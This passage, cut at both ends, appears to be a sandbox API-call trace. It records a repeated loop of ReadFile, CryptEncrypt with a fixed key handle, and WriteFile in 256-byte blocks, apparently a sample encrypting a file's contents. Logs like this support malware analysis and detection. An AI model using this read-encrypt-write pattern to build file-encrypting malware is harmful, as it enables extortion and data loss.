nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.030] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.030] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.030] GetLastError () returned 0x0 [0172.030] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.030] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.031] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.031] GetLastError () returned 0x0 [0172.031] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.031] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.031] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.031] GetLastError () returned 0x0 [0172.031] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.031] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.031] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.031] GetLastError () returned 0x0 [0172.031] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.031] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.031] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.031] GetLastError () returned 0x0 [0172.031] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.031] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.031] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.031] GetLastError () returned 0x0 [0172.031] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.031] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.031] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.031] GetLastError () returned 0x0 [0172.031] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.031] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.032] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.032] GetLastError () returned 0x0 [0172.032] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.032] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.032] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.032] GetLastError () returned 0x0 [0172.032] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.032] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.032] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.032] GetLastError () returned 0x0 [0172.032] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.032] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.032] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.032] GetLastError () returned 0x0 [0172.032] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.032] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.032] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.032] GetLastError () returned 0x0 [0172.032] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.032] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.032] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.032] GetLastError () returned 0x0 [0172.032] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.032] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.033] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.033] GetLastError () returned 0x0 [0172.033] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.033] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.033] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.033] GetLastError () returned 0x0 [0172.033] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.033] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.033] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.033] GetLastError () returned 0x0 [0172.033] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.033] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.033] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.033] GetLastError () returned 0x0 [0172.033] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.033] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.033] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.033] GetLastError () returned 0x0 [0172.033] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.033] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.033] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.033] GetLastError () returned 0x0 [0172.033] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.033] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.033] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.033] GetLastError () returned 0x0 [0172.033] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.034] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.034] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.034] GetLastError () returned 0x0 [0172.034] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.034] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.034] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.034] GetLastError () returned 0x0 [0172.034] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.034] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.034] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.034] GetLastError () returned 0x0 [0172.034] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.034] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.034] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.034] GetLastError () returned 0x0 [0172.034] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.035] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.035] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.035] GetLastError () returned 0x0 [0172.035] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.035] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.035] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.035] GetLastError () returned 0x0 [0172.035] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.035] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.035] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.035] GetLastError () returned 0x0 [0172.035] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.035] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.035] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.035] GetLastError () returned 0x0 [0172.035] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.035] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.035] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.035] GetLastError () returned 0x0 [0172.035] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.035] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.036] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.036] GetLastError () returned 0x0 [0172.036] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.036] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.036] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.036] GetLastError () returned 0x0 [0172.036] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.036] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, 